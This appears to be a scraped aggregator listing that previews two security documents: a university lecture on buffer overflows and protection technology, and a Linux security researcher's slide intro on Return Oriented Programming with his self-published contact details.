More informationBuffer Overflow and Protection Technology. Department of Computer Science,
Buffer Overflow and Protection Technology Department of Computer Science, Lorenzo Cavallaro Andrea Lanzi Table of Contents Introduction
More informationidkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow.
idkwim@gmail.com idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com choicy90@nate.com (Nate-On) @idkwim idkwim.linknow.kr Zombie PC?? -> No! Return Oriented Programming
More information